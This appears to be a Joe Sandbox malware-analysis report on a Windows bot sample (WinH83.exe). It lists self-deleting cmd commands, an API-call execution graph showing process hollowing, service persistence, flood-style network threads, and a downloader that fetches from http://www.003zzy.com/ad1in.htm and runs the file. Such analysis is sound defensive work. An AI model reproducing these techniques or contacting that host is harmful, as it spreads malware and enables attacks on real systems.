      MD5 hash:4194BA809C07479D0B6C3681D218661B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

      Target ID:1
      Start time:03:31:32
      Start date:06/04/2025
      Path:C:\Windows\SysWOW64\WinH83.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\system32\WinH83.exe"
      Imagebase:0x7ff7e2000000
      File size:50'382'421 bytes
      MD5 hash:C7B758D198A32EF2BA4112EF346C74BA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Antivirus matches:
      • Detection: 100%, Avira
      Reputation:low
      Has exited:true

      Target ID:2
      Start time:03:31:32
      Start date:06/04/2025
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
      Imagebase:0x220000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:03:31:32
      Start date:06/04/2025
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
      Imagebase:0x220000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Execution Graph

      Execution Coverage

      Dynamic/Packed Code Coverage

      Signature Coverage

      Execution Coverage:11.9%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:26.6%
      Total number of Nodes:571
      Total number of Limit Nodes:8
      Show Legend
      Hide Nodes/Edges
      execution_graph 1446 401860 GetModuleHandleA GetProcAddress 1447 40189a 1446->1447 1448 4018a5 GlobalAlloc 1447->1448 1449 401a0b printf 1447->1449 1450 4018c1 1448->1450 1450->1449 1451 4018c9 LoadLibraryExA 1450->1451 1452 4018f2 GetLastError printf 1451->1452 1453 40190f GlobalFree GetProcAddress 1451->1453 1454 401940 1453->1454 1455 40192a printf 1453->1455 1464 401720 1454->1464 1457 401949 1458 401952 printf 1457->1458 1459 401968 printf 1457->1459 1460 40198e 1459->1460 1461 4019ed printf FreeLibrary 1460->1461 1471 401680 1460->1471 1468 401748 1464->1468 1465 401839 printf 1466 401847 1465->1466 1466->1457 1467 401833 1467->1465 1467->1466 1468->1465 1468->1467 1469 4017dc printf 1468->1469 1470 40181e 1468->1470 1469->1468 1470->1457 1472 401688 DeviceIoControl 1471->1472 1473 4016b7 printf 1471->1473 1472->1473 1474 4016ad GetLastError 1472->1474 1473->1460 1473->1461 1474->1473 1475 401b60 CreateFileA 1476 401b85 GetFileSize 1475->1476 1477 401bcb CloseHandle 1475->1477 1476->1477 1478 401b98 ??2@YAPAXI ReadFile CloseHandle 1476->1478 1479 401f60 RegisterServiceCtrlHandlerA SetServiceStatus 1480 401ff3 1479->1480 1502 401000 LoadLibraryA 1480->1502 1483 40202e 1507 405440 1483->1507 1484 402009 1484->1483 1488 402011 1484->1488 1485 40201d 1486 4054b0 3 API calls 1485->1486 1489 40201b 1486->1489 1491 4053c0 3 API calls 1488->1491 1490 40203d GetModuleFileNameA 1489->1490 1510 404c10 GetModuleHandleA GetProcAddress 1490->1510 1491->1489 1493 40205d 1511 405270 CreateFileA 1493->1511 1495 402083 1496 402093 1495->1496 1497 40208c ExitProcess 1495->1497 1519 401030 GetSystemDirectoryA 1496->1519 1499 402098 GetCurrentProcess SetPriorityClass 1522 402310 CreateMutexA GetLastError 1499->1522 1501 4020af 1503 401012 GetProcAddress 1502->1503 1504 40102b 1502->1504 1505 401022 1503->1505 1506 401024 FreeLibrary 1503->1506 1504->1483 1504->1484 1504->1485 1505->1506 1506->1504 1508 405452 1507->1508 1509 40545c GetSystemDirectoryA lstrcat lstrcpy 1507->1509 1508->1490 1509->1490 1510->1493 1512 4052a4 1511->1512 1513 40531f 1511->1513 1512->1513 1514 4052a8 GetFileSize ??2@YAPAXI ReadFile 1512->1514 1513->1495 1515 405303 CloseHandle ??3@YAXPAX 1514->1515 1516 4052ec 1514->1516 1515->1495 1526 405330 1516->1526 1518 405301 1518->1515 1520 401079 1519->1520 1520->1520 1521 40108e GetPEB GetPEB GetPEB 1520->1521 1521->1499 1523 402338 CloseHandle 1522->1523 1524 40234a WSAStartup 1522->1524 1523->1501 1525 40236c CreateThread WaitForSingleObject CloseHandle Sleep 1524->1525 1525->1525 1561 4023a0 1525->1561 1532 404d20 1526->1532 1528 40535f 1529 4053a9 1528->1529 1541 405050 1528->1541 1529->1518 1531 405388 VirtualFree 1531->1518 1533 404eb3 1532->1533 1534 404d35 1532->1534 1533->1528 1534->1533 1535 404d9a VirtualAlloc 1534->1535 1536 404ea6 1535->1536 1538 404db9 memmove 1535->1538 1536->1528 1540 404e13 1538->1540 1539 404e42 memmove 1539->1540 1540->1536 1540->1539 1553 404f50 CreateProcessA 1541->1553 1543 405091 1544 40525c 1543->1544 1545 4050e4 1543->1545 1546 4050ca VirtualProtectEx 1543->1546 1544->1531 1547 40521b TerminateProcess CloseHandle CloseHandle CloseHandle 1545->1547 1556 404f00 LoadLibraryA 1545->1556 1552 4050fa 1546->1552 1547->1531 1549 40516c WriteProcessMemory WriteProcessMemory 1549->1547 1550 4051aa SetThreadContext ResumeThread CloseHandle CloseHandle 1549->1550 1550->1531 1552->1547 1552->1549 1554 404fa5 GetThreadContext ReadProcessMemory VirtualQueryEx 1553->1554 1555 405039 1553->1555 1554->1543 1555->1543 1557 404f15 GetProcAddress 1556->1557 1558 404f3f 1556->1558 1559 404f25 1557->1559 1560 404f38 FreeLibrary 1557->1560 1558->1552 1559->1560 1560->1558 1562 4025c5 socket 1561->1562 1563 4023b8 lstrlen 1561->1563 1635 4030e0 inet_addr 1562->1635 1564 4023e6 1563->1564 1629 402c80 wvsprintfA OutputDebugStringA 1564->1629 1568 402c71 1569 4023f3 strstr 1570 402420 1569->1570 1571 4024a2 1569->1571 1572 402517 strstr 1570->1572 1630 401440 LoadLibraryA 1571->1630 1578 402541 strstr 1572->1578 1579 40252e 1572->1579 1574 40262b 1575 402c6a closesocket 1574->1575 1638 402fd0 1574->1638 1575->1568 1576 4024af _strlwr lstrcpy strstr 1576->1572 1581 4024dc 1576->1581 1578->1562 1580 402550 strcspn strncpy strcspn strstr 1578->1580 1579->1578 1580->1562 1583 402596 strcspn strncpy atoi 1580->1583 1584 4024e2 Sleep 1581->1584 1582 40265e 1643 402cb0 RegOpenKeyExA 1582->1643 1583->1562 1586 401440 6 API calls 1584->1586 1588 4024f6 _strlwr lstrcpy strstr 1586->1588 1587 40266b 1589 402682 send 1587->1589 1588->1572 1588->1584 1589->1575 1619 4026a4 1589->1619 1590 402c54 InterlockedExchange shutdown 1590->1575 1591 4026b3 select 1591->1590 1591->1619 1592 4026fb __WSAFDIsSet 1592->1591 1593 40270d recv 1592->1593 1593->1590 1593->1619 1594 402744 InterlockedExchange 1594->1619 1595 40276a CreateThread 1595->1595 1595->1619 1826 403110 28 API calls 1595->1826 1596 402b8a InterlockedExchange 1596->1591 1597 402b9c OpenMutexA 1598 402bc1 GetSystemDirectoryA lstrcat lstrcat DeleteFileA 1597->1598 1599 402bb3 ReleaseMutex CloseHandle 1597->1599 1669 4022c0 OpenSCManagerA 1598->1669 1599->1598 1600 402a27 CreateThread 1600->1619 1676 4046c0 htons 1600->1676 1601 402791 CreateThread 1601->1601 1601->1619 1684 403110 WSASocketA 1601->1684 1602 4027b2 CreateThread 1602->1619 1698 403110 28 API calls 1602->1698 1605 401390 6 API calls 1611 402b1e ExitWindowsEx 1605->1611 1607 402a93 shutdown closesocket 1607->1591 1609 4027d4 CreateThread 1609->1609 1609->1619 1699 403440 WSAStartup WSASocketA 1609->1699 1610 402af5 ExitWindowsEx 1610->1591 1611->1591 1613 402a73 send 1613->1591 1614 4027fb CreateThread 1614->1614 1614->1619 1713 403440 13 API calls 1614->1713 1615 402822 CreateThread 1615->1615 1615->1619 1714 403a30 htons 1615->1714 1616 402849 CreateThread 1616->1616 1616->1619 1725 4035d0 1616->1725 1617 402870 CreateThread 1617->1617 1617->1619 1739 403710 htons 1617->1739 1618 402897 CreateThread 1618->1618 1618->1619 1751 403850 socket htons 1618->1751 1619->1590 1619->1591 1619->1592 1619->1594 1619->1595 1619->1596 1619->1597 1619->1600 1619->1601 1619->1602 1619->1605 1619->1607 1619->1609 1619->1613 1619->1614 1619->1615 1619->1616 1619->1617 1619->1618 1620 4028d4 CreateThread 1619->1620 1621 4028be CreateThread 1619->1621 1622 4028f0 CreateThread CreateThread 1619->1622 1623 40291e CreateThread 1619->1623 1624 402945 CreateThread 1619->1624 1625 40296c CreateThread 1619->1625 1626 402993 CreateThread 1619->1626 1627 4029b4 CreateThread 1619->1627 1628 4029ce recv 1619->1628 1654 401390 GetCurrentProcess OpenProcessToken 1619->1654 1661 401640 LoadLibraryA GetProcAddress 1619->1661 1663 401510 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 1619->1663 1620->1619 1759 403cc0 htons 1620->1759 1621->1620 1621->1621 1765 403ba0 htons 1621->1765 1622->1619 1777 403cc0 8 API calls 1622->1777 1778 403d70 htons 1622->1778 1623->1619 1623->1623 1786 403cc0 8 API calls 1623->1786 1624->1619 1624->1624 1787 403e20 strstr 1624->1787 1625->1619 1625->1625 1802 404340 htons 1625->1802 1626->1619 1626->1626 1812 404090 strstr 1626->1812 1627->1619 1827 404490 1627->1827 1628->1619 1629->1569 1631 401503 1630->1631 1632 40145c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 1630->1632 1631->1576 1634 4014a0 FreeLibrary 1632->1634 1634->1576 1636 4030f0 gethostbyname 1635->1636 1637 4025fa htons connect 1635->1637 1636->1637 1637->1568 1637->1574 1639 402fe9 setsockopt 1638->1639 1640 402fde 1638->1640 1641 403016 WSAIoctl 1639->1641 1642 40300e 1639->1642 1640->1582 1641->1582 1642->1582 1644 402d14 RegQueryValueExA RegCloseKey 1643->1644 1645 402d95 GetVersionExA 1643->1645 1644->1645 1646 402d72 1644->1646 1649 402dfc 1645->1649 1652 402e09 wsprintfA GlobalMemoryStatusEx 1645->1652 1646->1645 1648 402d78 _strnicmp 1646->1648 1648->1645 1648->1646 1649->1587 1674 4056b0 1652->1674 1655 4013b3 1654->1655 1656 4013b7 LookupPrivilegeValueA 1654->1656 1655->1610 1657 4013cd CloseHandle 1656->1657 1658 4013de AdjustTokenPrivileges 1656->1658 1657->1610 1659 401421 CloseHandle 1658->1659 1660 401432 1658->1660 1659->1610 1660->1610 1662 40166e FreeLibrary 1661->1662 1662->1619 1664 401567 1663->1664 1665 401581 ??2@YAPAXI 1664->1665 1666 40161c FreeLibrary FreeLibrary 1664->1666 1667 40159b 1665->1667 1666->1619 1667->1666 1668 40159f strncpy CreateProcessA 1667->1668 1668->1666 1670 402304 wsprintfA SHDeleteKeyA closesocket ExitProcess 1669->1670 1671 4022d6 OpenServiceA 1669->1671 1672 4022f5 DeleteService CloseServiceHandle 1671->1672 1673 4022ff CloseServiceHandle 1671->1673 1672->1673 1673->1670 1675 402f28 _ui64toa GetSystemDefaultUILanguage 1674->1675 1675->1587 1677 4030e0 2 API calls 1676->1677 1678 4046f9 1677->1678 1679 40476f 1678->1679 1680 404719 socket 1678->1680 1681 40472c sendto Sleep 1680->1681 1681->1681 1682 40474f closesocket Sleep 1681->1682 1682->1680 1683 404763 1682->1683 1685 403164 setsockopt 1684->1685 1686 403156 1684->1686 1687 403181 1685->1687 1688 40318f setsockopt 1685->1688 1689 4031b0 1688->1689 1690 4031be htons 1688->1690 1691 4030e0 2 API calls 1690->1691 1695 4031e4 1691->1695 1692 403428 1693 403250 17 API calls 1694 403323 htons htons 1693->1694 1693->1695 1694->1695 1695->1692 1695->1693 1695->1694 1696 4033ea sendto Sleep 1695->1696 1696->1696 1697 403413 Sleep 1696->1697 1697->1692 1697->1693 1700 403488 setsockopt 1699->1700 1701 40347a 1699->1701 1702 4034b5 setsockopt 1700->1702 1703 4034a7 1700->1703 1704 4030e0 2 API calls 1702->1704 1705 4034f1 1704->1705 1835 4011a0 1705->1835 1707 403500 GetCurrentProcessId 1708 4035b4 1707->1708 1711 403544 1707->1711 1709 403550 GetTickCount 1709->1711 1710 403568 sendto 1710->1711 1711->1708 1711->1709 1711->1710 1712 40359e Sleep 1711->1712 1712->1711 1715 4030e0 2 API calls 1714->1715 1719 403a70 1715->1719 1716 403b81 1717 403a84 socket connect 1718 403b7a closesocket 1717->1718 1717->1719 1718->1716 1719->1716 1719->1717 1720 403af2 sprintf send 1719->1720 1721 4011a0 GetTickCount srand rand 1719->1721 1722 403b54 closesocket 1720->1722 1723 403b3a Sleep 1720->1723 1721->1719 1722->1717 1724 403b68 1722->1724 1723->1719 1723->1722 1838 4056d0 1725->1838 1728 4030e0 2 API calls 1729 403610 1728->1729 1730 4036fd 1729->1730 1731 40362e socket setsockopt 1729->1731 1732 4011a0 3 API calls 1731->1732 1733 403664 1732->1733 1734 4011a0 3 API calls 1733->1734 1735 403691 sendto 1733->1735 1737 4036cb closesocket Sleep 1733->1737 1734->1733 1735->1733 1736 4036b5 Sleep 1735->1736 1736->1733 1737->1731 1738 4036eb 1737->1738 1740 4030e0 2 API calls 1739->1740 1741 40374c 1740->1741 1742 40383d 1741->1742 1743 40376a socket connect setsockopt 1741->1743 1744 4011a0 3 API calls 1743->1744 1745 4037ae 1744->1745 1746 4011a0 3 API calls 1745->1746 1747 4037d8 send 1745->1747 1749 40380b closesocket Sleep 1745->1749 1746->1745 1747->1745 1748 4037f5 Sleep 1747->1748 1748->1745 1749->1743 1750 40382b 1749->1750 1752 4030e0 2 API calls 1751->1752 1753 40389b htons htons htons htons htons 1752->1753 1754 403a1c 1753->1754 1755 403906 1753->1755 1756 403957 sendto Sleep 1755->1756 1757 4011a0 GetTickCount srand rand 1755->1757 1756->1755 1758 403a0a 1756->1758 1757->1755 1760 4030e0 2 API calls 1759->1760 1761 403cf9 1760->1761 1762 403d61 1761->1762 1763 403d1f socket connect Sleep closesocket Sleep 1761->1763 1763->1763 1764 403d52 1763->1764 1766 4030e0 2 API calls 1765->1766 1770 403bdc 1766->1770 1767 403cae 1768 403c00 socket connect 1769 403c21 closesocket 1768->1769 1768->1770 1769->1770 1770->1767 1770->1768 1771 4011a0 3 API calls 1770->1771 1772 403c9c 1770->1772 1773 4011a0 3 API calls 1770->1773 1771->1770 1774 403c60 send 1773->1774 1775 403c71 Sleep 1774->1775 1776 403c7f closesocket Sleep 1774->1776 1775->1770 1775->1776 1776->1770 1779 4030e0 2 API calls 1778->1779 1780 403db0 1779->1780 1781 403dd5 socket connect Sleep 1780->1781 1781->1781 1782 403dfb 1781->1782 1783 403e11 1782->1783 1784 403e04 Sleep 1782->1784 1785 403e1b closesocket 1783->1785 1784->1783 1784->1784 1785->1785 1788 403e72 1787->1788 1789 403e88 strstr 1787->1789 1788->1789 1790 403e97 strcspn strncpy strcspn 1789->1790 1791 403efa htons 1789->1791 1790->1791 1793 4030e0 2 API calls 1791->1793 1794 403f67 wsprintfA 1793->1794 1795 40407e 1794->1795 1797 403fd3 1794->1797 1796 403fda socket connect 1796->1797 1798 403ffb setsockopt setsockopt 1796->1798 1797->1796 1800 40406f 1797->1800 1799 404028 send Sleep 1798->1799 1799->1799 1801 404052 closesocket Sleep 1799->1801 1801->1797 1803 4030e0 2 API calls 1802->1803 1804 40437d wsprintfA 1803->1804 1805 4043d6 1804->1805 1806 40447c 1804->1806 1807 4043df socket connect 1805->1807 1809 40446d 1805->1809 1807->1805 1808 404400 setsockopt setsockopt 1807->1808 1810 40442d send Sleep 1808->1810 1810->1810 1811 404451 closesocket Sleep 1810->1811 1811->1805 1813 4040e2 1812->1813 1814 4040f8 strstr 1812->1814 1813->1814 1815 404107 strcspn strncpy strcspn 1814->1815 1817 40416a htons 1814->1817 1815->1817 1818 4030e0 2 API calls 1817->1818 1821 4041d7 1818->1821 1819 404218 wsprintfA 1820 40424b wsprintfA socket connect 1819->1820 1819->1821 1820->1821 1822 404296 setsockopt setsockopt 1820->1822 1821->1819 1821->1820 1824 40431e 1821->1824 1823 4042d3 send Sleep 1822->1823 1823->1823 1825 4042fd closesocket Sleep 1823->1825 1825->1821 1828 4056d0 1827->1828 1829 40449a LoadLibraryA 1828->1829 1830 4045c0 FreeLibrary 1829->1830 1831 4044be GetProcAddress GetProcAddress GetProcAddress GetProcAddress 1829->1831 1831->1830 1834 4044ff Sleep 1831->1834 1833 4045bf 1833->1830 1834->1833 1836 4011b3 GetTickCount srand rand 1835->1836 1837 4011ae 1835->1837 1836->1707 1837->1707 1839 4035da htons 1838->1839 1839->1728 1840 4020e0 1841 402145 SetServiceStatus 1840->1841 1842 4020ee 1840->1842 1843 40215d SetServiceStatus 1841->1843 1844 4020f1 1842->1844 1845 40211c SetServiceStatus SetServiceStatus 1842->1845 1844->1843 1846 4020f4 SetServiceStatus SetServiceStatus 1844->1846 1847 4045e0 htons 1848 4030e0 2 API calls 1847->1848 1850 40461d 1848->1850 1849 404694 1850->1849 1851 404639 socket connect 1850->1851 1853 40465c send 1850->1853 1851->1850 1852 4046a0 closesocket 1851->1852 1854 404680 closesocket Sleep 1853->1854 1855 404671 Sleep 1853->1855 1854->1849 1854->1851 1855->1853 1855->1854 1856 4073e0 1858 40745e 1856->1858 1857 4075b8 1858->1857 1859 40b000 2 API calls 1858->1859 1860 40b0c1 1859->1860 1415 401001 1416 401004 1415->1416 1417 401012 GetProcAddress 1416->1417 1418 40102b 1416->1418 1419 401022 1417->1419 1420 401024 FreeLibrary 1417->1420 1419->1420 1420->1418 1421 401cc5 1422 401cc7 1421->1422 1422->1422 1425 401b10 CreateFileA 1422->1425 1424 401ce4 ??3@YAXPAX 1426 401b34 WriteFile CloseHandle 1425->1426 1427 401b5a 1425->1427 1426->1424 1427->1424 1861 4068e5 GetTickCount 1862 406820 1861->1862 1863 406826 14 API calls 1862->1863 1863->1861 1428 401c07 Sleep VirtualAlloc 1429 401c30 1428->1429 1430 401c6b 1428->1430 1432 401c3c 1429->1432 1433 401c48 VirtualFree 1432->1433 1435 401c6b 1433->1435 1435->1430 1864 40d06a DeleteFileA 1865 40d099 GetPEB 1864->1865 1866 40d03f GetProcAddress 1864->1866 1867 40d0b1 1865->1867 1868 40d034 1866->1868 1868->1866 1869 40d01f LoadLibraryA 1868->1869 1871 406826 14 API calls 1868->1871 1872 40682d 14 API calls 1868->1872 1869->1868 1870 40d07e DeleteFileA 1870->1865 1870->1866 1871->1870 1872->1870 1873 401a30 OpenSCManagerA 1874 401aa3 1873->1874 1875 401a47 OpenServiceA StartServiceA 1873->1875 1876 401a74 CreateFileA CloseServiceHandle CloseServiceHandle 1875->1876 1877 401a66 puts 1875->1877 1877->1876 1878 401ab0 CloseHandle OpenSCManagerA 1879 401ad1 OpenServiceA 1878->1879 1880 401b06 1878->1880 1881 401af0 ControlService CloseServiceHandle 1879->1881 1882 401b01 CloseServiceHandle 1879->1882 1881->1882 1882->1880 1436 405851 _exit 1883 407173 1884 407182 1883->1884 1885 40b000 2 API calls 1884->1885 1886 40b0c1 1885->1886 1887 406934 1888 406937 1887->1888 1889 4010f0 8 API calls 1888->1889 1890 406941 1889->1890 1891 4010f0 8 API calls 1890->1891 1891->1890 1892 40b235 1894 40b1a0 1892->1894 1895 40b092 1892->1895 1898 40720c LoadLibraryA GetProcAddress 1895->1898 1897 40b09b 1898->1897 1437 40d016 1438 40d01f LoadLibraryA 1437->1438 1439 40d034 1438->1439 1439->1438 1440 40d03f GetProcAddress 1439->1440 1444 406826 14 API calls 1439->1444 1445 40682d 14 API calls 1439->1445 1440->1439 1441 40d07e DeleteFileA 1441->1440 1442 40d099 GetPEB 1441->1442 1443 40d0b1 1442->1443 1444->1441 1445->1441 1254 40653c 1255 4065d5 1254->1255 1260 406567 1254->1260 1256 4065df GetProcAddress LoadLibraryA 1255->1256 1257 4065f2 1256->1257 1258 406640 GetProcAddress Sleep 1257->1258 1259 406600 GetProcAddress GetProcAddress 1257->1259 1262 406666 InternetOpenA InternetOpenUrlA InternetReadFile InternetCloseHandle InternetCloseHandle 1258->1262 1261 406624 GetProcAddress 1259->1261 1260->1256 1260->1257 1260->1261 1263 4065be LoadLibraryA 1260->1263 1261->1258 1264 406701 1262->1264 1265 40677b URLDownloadToFileA Sleep ShellExecuteA Sleep 1262->1265 1263->1255 1264->1262 1265->1265 1266 40d07e DeleteFileA 1267 40d099 GetPEB 1266->1267 1268 40d03f GetProcAddress 1266->1268 1270 40d0b1 1267->1270 1271 40d034 1268->1271 1269 40d03a 1269->1268 1271->1269 1272 40d01f LoadLibraryA 1271->1272 1275 406826 1271->1275 1284 40682d 1271->1284 1272->1271 1276 40682d lstrcat lstrcat CreateFileA SetFilePointer 1275->1276 1278 4068a0 WriteFile 1276->1278 1278->1278 1279 4068ca CloseHandle 1278->1279 1280 406937 1279->1280 1292 4010f0 LoadLibraryA 1280->1292 1282 406941 1283 4010f0 8 API calls 1282->1283 1283->1282 1285 406848 lstrcat lstrcat CreateFileA SetFilePointer 1284->1285 1286 4068a0 WriteFile 1285->1286 1286->1286 1287 4068ca CloseHandle 1286->1287 1288 406937 1287->1288 1289 4010f0 8 API calls 1288->1289 1290 406941 1289->1290 1291 4010f0 8 API calls 1290->1291 1291->1290 1293 401112 Sleep GetProcAddress 1292->1293 1294 40110c 1292->1294 1295 401135 lstrcpy GetStartupInfoA Sleep CreateProcessInternalA FreeLibrary 1293->1295 1296 40112f 1293->1296 1294->1282 1295->1282 1296->1282 1297 4056ff __set_app_type __p__fmode __p__commode 1298 40576e 1297->1298 1299 405782 1298->1299 1300 405776 __setusermatherr 1298->1300 1309 40586a _controlfp 1299->1309 1300->1299 1302 405787 _initterm __getmainargs _initterm 1303 4057db GetStartupInfoA 1302->1303 1305 40580f GetModuleHandleA 1303->1305 1310 401d00 SetErrorMode 1305->1310 1308 405833 exit _XcptFilter 1309->1302 1311 401d59 1310->1311 1348 4047e0 1311->1348 1313 401d6f GetModuleHandleA FreeLibrary 1314 401d8e 1313->1314 1319 401da6 1313->1319 1315 401d91 1314->1315 1316 401da8 1314->1316 1315->1319 1357 4053c0 1315->1357 1360 4054b0 1316->1360 1320 401ddb 1319->1320 1321 401e0f 1319->1321 1323 401dfe 1320->1323 1324 401dde 1320->1324 1369 405600 1321->1369 1325 405590 3 API calls 1323->1325 1327 401df2 1324->1327 1328 401de6 1324->1328 1330 401df0 1325->1330 1326 401e1e lstrcat GetModuleFileNameA lstrcmpi 1331 401e63 GetCurrentProcess SetPriorityClass 1326->1331 1332 401e89 lstrcmpi 1326->1332 1366 405520 1327->1366 1363 405590 1328->1363 1330->1326 1372 401be1 1331->1372 1335 401f03 StartServiceCtrlDispatcherA 1332->1335 1336 401e9c 1332->1336 1337 401f32 1335->1337 1338 401f4e 1335->1338 1340 401eaa CopyFileA 1336->1340 1374 402170 OpenSCManagerA 1337->1374 1338->1308 1341 401ec3 SetFileAttributesA 1340->1341 1342 401ef6 1340->1342 1347 40690a 1341->1347 1351 4011e0 GetEnvironmentVariableA 1342->1351 1346 401efb ExitProcess 1347->1308 1384 404820 1348->1384 1350 4047fa 1350->1313 1352 401378 1351->1352 1353 401208 GetModuleFileNameA 1351->1353 1352->1346 1353->1352 1354 401222 GetShortPathNameA 1353->1354 1354->1352 1355 40123f 8 API calls 1354->1355 1355->1352 1356 40134d SetPriorityClass SetThreadPriority ResumeThread 1355->1356 1356->1346 1358 4053d2 1357->1358 1359 4053dc GetSystemDirectoryA lstrcat lstrcpy 1357->1359 1358->1319 1359->1319 1361 4054c2 1360->1361 1362 4054cc GetSystemDirectoryA lstrcat lstrcpy 1360->1362 1361->1319 1362->1319 1364 4055a2 1363->1364 1365 4055ac GetSystemDirectoryA lstrcat lstrcpy 1363->1365 1364->1330 1365->1330 1367 405532 1366->1367 1368 40553c GetWindowsDirectoryA lstrcat lstrcpy 1366->1368 1367->1330 1368->1330 1370 405612 1369->1370 1371 40561c GetSystemDirectoryA lstrcat lstrcpy 1369->1371 1370->1326 1371->1326 1407 401bed CreateThread 1372->1407 1375 402271 1374->1375 1376 4021be CreateServiceA 1374->1376 1408 402294 1375->1408 1377 402217 StartServiceA 1376->1377 1378 4021e9 GetLastError 1376->1378 1377->1375 1381 402226 wsprintfA RegOpenKeyA lstrlen RegSetValueExA 1377->1381 1378->1377 1380 4021f6 OpenServiceA 1378->1380 1380->1375 1383 40220c StartServiceA 1380->1383 1381->1375 1383->1377 1385 404831 1384->1385 1388 4071e2 GetPEB 1385->1388 1390 407182 1388->1390 1392 4048bd 1390->1392 1393 40b000 1390->1393 1392->1350 1394 40b0aa 1393->1394 1395 40b0b7 1394->1395 1399 40b0e3 1394->1399 1397 40b000 2 API calls 1395->1397 1398 40b0c1 1397->1398 1400 40b107 1399->1400 1402 40b114 1400->1402 1403 40b269 1400->1403 1402->1395 1406 40720c LoadLibraryA GetProcAddress 1403->1406 1405 40b273 1406->1405 1409 4022a2 1408->1409 1410 40229b RegCloseKey 1408->1410 1411 4022a6 CloseServiceHandle 1409->1411 1412 4022ad 1409->1412 1410->1409 1411->1412 1413 4022b1 CloseServiceHandle 1412->1413 1414 401f4b 1412->1414 1413->1414 1414->1338

      Executed Functions

      Control-flow Graph

      APIs
      • SetErrorMode.KERNEL32(00000001), ref: 00401D08
      • GetModuleHandleA.KERNEL32(kmon.dll,?,?,?,?,?,000001BC,000007C2), ref: 00401D77
      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,000001BC,000007C2), ref: 00401D7E
      • lstrcat.KERNEL32(?,WinH83.exe), ref: 00401E2C
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E41
      • lstrcmpi.KERNEL32(?,?), ref: 00401E5D
      • GetCurrentProcess.KERNEL32(00004000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E68
      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E6F
      • lstrcmpi.KERNEL32(?,?), ref: 00401E96
      • CopyFileA.KERNEL32(?,?,00000000), ref: 00401EB9
      • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401ECA
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$Modulelstrcmpi$AttributesClassCopyCurrentErrorFreeHandleLibraryModeNamePriorityProcesslstrcat
      • String ID: 8$A$B$C$D$E$F$G$H$I$J$K$Mu$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$WinH83$WinH83.exe$Windows Help System83$Windows83$kmon.dll
      • API String ID: 139532127-2983036780
      • Opcode ID: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction ID: 5410645d6abaed84b275c9712b1141a2809baf3a13989eb83d3553c9209378c8
      • Opcode Fuzzy Hash: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction Fuzzy Hash: A281F8B0148342ABD310EB60DD45BDB7BD8EF84718F40492EF689661D1EBBCD51887AB

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNEL32(urlmon.dll,00707474), ref: 004065C9
      • GetProcAddress.KERNEL32 ref: 004065DF
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 004065F1
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenA), ref: 00406607
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenUrlA), ref: 0040661F
      • GetProcAddress.KERNEL32(6F3E0000,InternetReadFile), ref: 00406637
      • GetProcAddress.KERNEL32(6F3E0000,InternetCloseHandle), ref: 0040664F
      • Sleep.KERNEL32(001B7740), ref: 00406660
      • InternetOpenA.WININET(MyAgrent,00000000,00000000,00000000,00000000), ref: 00406674
      • InternetOpenUrlA.WININET(http://www.003zzy.com/ad1in.htm,00000000,00000000,80000000,00000000), ref: 0040669D
      • InternetReadFile.WININET(00406949,000000FF,00406544), ref: 004066C5
      • InternetCloseHandle.WININET ref: 004066D1
      • InternetCloseHandle.WININET ref: 004066DD
      Strings
